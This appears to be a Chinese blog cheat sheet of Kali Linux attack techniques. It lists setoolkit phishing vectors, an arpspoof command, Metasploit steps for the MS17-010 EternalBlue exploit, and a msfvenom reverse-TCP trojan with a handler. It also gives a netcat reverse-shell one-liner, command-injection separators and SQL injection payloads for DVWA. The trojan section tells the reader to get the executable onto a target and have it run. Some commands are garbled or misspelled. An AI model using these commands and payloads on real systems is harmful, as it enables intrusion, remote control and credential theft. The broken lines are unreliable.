Kali常用攻击方式

1 社会工程学 setoolkit

1)Social-Engineering Attacks:社会工程学攻击

1Spear-Phishing Attack Vectors:鱼叉式网络钓鱼攻击向量

2Website Attack Vectors:网页攻击向量

3Infectious Media Generator:感染式媒介生成器

4Create a Payload and Listener:创建PayloadListener

5Mass Mailer Attack:海量邮件攻击

6Arduino-Based Attack Vector:基于Arduino的硬件攻击向量

7Wireless Access Point Attack Vector:无线热点攻击向量

8QRCode Generator Attack Vector:二维码攻击向量

9Powershell Attack VectorsPowershell攻击向量

10Third Party Modules:第三方模块

99)返回到主菜单。
————————————————
 
    
2
    
2Penestration TestingFast-Track):渗透测试(Fast-Track3Third Party Modules:第三方模块

4Update the Social-Engineer Toolkit:升级社会工程学工具包

5Update SET configuration:升级SET配置

6Help, Credits, and About:帮助等


2 arp欺骗

# ① 命令:arpspoof
# ② 网卡: eth0
# ③ 攻击ip:192.168.44.134
# ④:替换ipMAC地址:192.168.44.2

sudo arpspoof -i eth0 -t 192.168.44.134 192.168.44.2

3 msfconsole

① 安装 apt install metasploit-framework

② 永恒之蓝 漏洞实验 ms17-010

步骤:

msfconsole # 进入msf
search ms17-010 # 搜索永恒之蓝模块
use 0 # 有四种攻击方式,选择第一种。
show options # 查看需要的配置项,字段Required 为true,为必填项
set rhosts 192.168.1.1 # 设置靶机ip,可一次设置多个
set rport  445 # 设置靶机端口
set lhost 192.168.1.2 #设置攻机ip
set lport 1524 # 设置攻机端口、
run # 开始攻击,出现------win----为攻击成功
help # 查看可以控制靶机命令,控制完成

4 制作远程控制靶机木马

生成的木马会被杀毒软件直接清除

#步骤一 生成木马执行文件 ,将生成的exe执行文件想办法放入到靶机中。
# -p payload 载荷
# payload_name 系统/架构/作用/方法 
# -f 格式 
# -o output
msfvenom -p windows/x64/meterpreter/reverse-tcp lhost=192.168.0.1 lport=9999 -f exe -o test.exe

msfconsole
use exploit/multi/handler
show options 
set plaload windows/x64/meterpreter/reverse-tcp # 负载方式、ip、端口需要和生成的执行文件一致
set lhost 192.168.0.1
set lport 9999
run
# 再通过别的手段让靶机双击执行文件,就攻击成功。

5 DVWA (web渗透机安装)

① dvwa安装路径:https://github.com/digininja/DVWA

② 安装phpstudy 2018年版本

③ 将dvwa文件放入phpstudy中的www目录中,将config.inc.php文件中的数据库用户名和密码修改为root/root,启动phpstudy服务,

④ 访问URL:http://localhost:80/dvwa ,在setup中创建数据库,访问账号密码:admin/password

6 DVWA_command 命令执行攻击

# 输入 127.0.0.1 测试环境
# windows可用分隔符: && || & |
# Linux 可用分隔符: && || & | ;

A; B   //A不论正确与否都会执行B
A&B   //A后台运行,A和B同时执行
A&&B   //A执行成功后才会执行B
A|B     //A执行的输出结果作为B命令的参数,A不论正确与否,都会执行B
A||B     //A执行失败后才会执行B命令

7 扩展:nc工具(瑞士军刀)——反弹shell

# 实验功放机都为kali
# 攻机
nc -lvp 8888
# 靶机
nc 10.196.93.101 -e /bi/bash 8888

8 DVWA_SQL注入

# 注入查询用户名和密码
# union 联合查询  
1' union select user,password from users#
'or 1=1 -- - #简单通用sql注入

① 使用sqlmap工具进行sql注入


9 信息收集

① Zenmap ip扫描

wait onload…

  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值